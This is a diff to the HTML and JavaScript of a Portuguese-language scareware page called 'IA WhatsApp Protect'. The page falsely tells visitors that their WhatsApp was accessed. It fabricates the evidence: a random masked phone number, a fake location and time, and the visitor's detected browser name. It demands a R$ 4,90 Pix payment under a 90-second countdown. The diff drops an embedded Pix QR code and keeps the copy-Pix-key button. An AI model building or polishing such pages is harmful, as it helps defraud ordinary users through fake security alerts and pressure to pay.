--- a/index.html
+++ b/index.html
@@ -16,7 +16,6 @@
     .title { font-size: 20px; font-weight: bold; margin-top: 8px; }
     .alerta { color: red; font-weight: bold; margin: 20px 0 10px; }
     .info { font-size: 16px; margin-top: 8px; line-height: 1.6; }
-    .qr-code { width: 220px; margin: 20px auto; display: block; }
     .pix-btn {
       background-color: #25D366;
       color: #fff;
@@ -33,36 +32,30 @@
 </head>
 <body>
 
-  <div id="conteudo">
+  <div class="logo">🔒 IA WhatsApp Protect</div>
+  <div class="title">Escudo de segurança ativado</div>
 
-    <div class="logo">🔒 IA WhatsApp Protect</div>
-    <div class="title">Escudo de segurança ativado</div>
+  <div class="alerta">⚠️ Atividade suspeita detectada</div>
 
-    <div class="alerta">⚠️ Atividade suspeita detectada</div>
+  <div class="info">
+    Detectamos um possível acesso indevido ao seu WhatsApp:<br>
+    Número: <b id="numero"></b><br>
+    Localização suspeita: <b>São Paulo – <span id="hora"></span></b><br><br>
 
-    <div class="info">
-      Detectamos um possível acesso indevido ao seu WhatsApp:<br>
-      Número: <b id="numero"></b><br>
-      Localização suspeita: <b>São Paulo – <span id="hora"></span></b><br><br>
+    <span id="sistemaNome"></span> ativou automaticamente o protocolo de emergência IA WhatsApp Protect,<br>
+    com escaneamento de ameaças em tempo real utilizando <b>tecnologia de Inteligência Artificial</b>.<br><br>
 
-      <b id="navegador"></b> ativou automaticamente o protocolo de emergência IA WhatsApp Protect,<br>
-      com escaneamento de ameaças em tempo real utilizando <b>tecnologia de Inteligência Artificial</b>.<br><br>
-
-      🔐 <b>Proteção instantânea por apenas R$ 4,90</b><br>
-      <span style="color:green;">Faça a validação da proteção agora</span>
-    </div>
-
-    <img class="qr-code" src="https://api.qrserver.com/v1/create-qr-code/?size=220x220&data=00020101021226850014br.gov.bcb.pix2563pix.santander.com.br/qr/v2/14e57911-d312-47bd-ac6d-0ae819a3772c52040000530398654044.905802BR5923SUL%20INTERMEDIACOES%20LTDA6009SAO%20PAULO62070503***6304BAAB" alt="QR Code">
-
-    <button class="pix-btn" onclick="copiarPix()">Copiar Chave Pix</button>
-    <div id="copiado" class="copiado" style="display:none;">✔ Chave Pix copiada</div>
-
-    <div class="contador" id="timer">⏳ Sua autenticação expira em 90 segundos.</div>
-
+    🔐 <b>Proteção instantânea por apenas R$ 4,90</b><br>
+    <span style="color:green;">Faça a validação da proteção agora</span>
   </div>
 
+  <button class="pix-btn" onclick="copiarPix()">Copiar Chave Pix</button>
+  <div id="copiado" class="copiado" style="display:none;">✔ Chave Pix copiada</div>
+
+  <div class="contador" id="timer">⏳ Sua autenticação expira em 90 segundos.</div>
+
   <script>
-    // Número aleatório
+    // Número parcialmente mascarado
     function gerarNumero() {
       const final1 = Math.floor(Math.random() * 90 + 10);
       const final2 = Math.floor(Math.random() * 90 + 10);
@@ -78,20 +71,19 @@
     }
     document.getElementById("hora").innerText = gerarHora();
 
-    // Navegador detectado ou fallback
+    // Nome do navegador
     function detectarNavegador() {
-      const ua = navigator.userAgent.toLowerCase();
-      if (ua.includes("edg")) return "O Microsoft Edge";
-      if (ua.includes("opr") || ua.includes("opera")) return "O Opera";
-      if (ua.includes("brave")) return "O Brave";
-      if (ua.includes("chrome")) return "O Google Chrome";
-      if (ua.includes("safari")) return "O Safari";
-      if (ua.includes("firefox")) return "O Mozilla Firefox";
+      const ua = navigator.userAgent;
+      if (ua.includes("Chrome")) return "O Google Chrome";
+      if (ua.includes("Firefox")) return "O Mozilla Firefox";
+      if (ua.includes("Safari") && !ua.includes("Chrome")) return "O Safari";
+      if (ua.includes("Opera") || ua.includes("OPR")) return "O Opera";
+      if (ua.includes("Edg")) return "O Microsoft Edge";
       return "O sistema";
     }
-    document.getElementById("navegador").innerText = detectarNavegador();
+    document.getElementById("sistemaNome").innerText = detectarNavegador();
 
-    // Timer
+    // Timer regressivo
     let segundos = 90;
     const timer = document.getElementById("timer");
     const intervalo = setInterval(() => {
@@ -114,3 +106,4 @@
   </script>
 </body>
 </html>
+
